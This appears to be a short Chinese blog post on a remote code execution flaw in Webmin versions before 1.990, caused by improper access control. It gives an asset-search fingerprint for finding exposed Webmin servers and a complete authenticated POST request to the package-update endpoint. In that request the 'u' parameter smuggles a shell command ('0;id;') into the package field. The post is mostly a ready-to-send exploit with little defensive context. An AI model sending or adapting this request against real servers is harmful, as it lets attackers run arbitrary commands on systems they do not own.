Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。
Webmin 1.990之前版本存在安全漏洞,该漏洞源于软件中存在不正确的访问控制,攻击者可以利用该漏洞实现远程代码执行
Webmin < 1.990
app="webmin"
登录页面
登录后发送请求包
POST /package-updates/update.cgi HTTP/1.1
Cookie: sid=882af4543067bc6214d2c769325f3b2f
Referer: http:///package-updates/update.cgi?xnavigation=1
mode=new&search=ssh&redir=&redirdesc=&u=0;id;&confirm=Install+Now
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!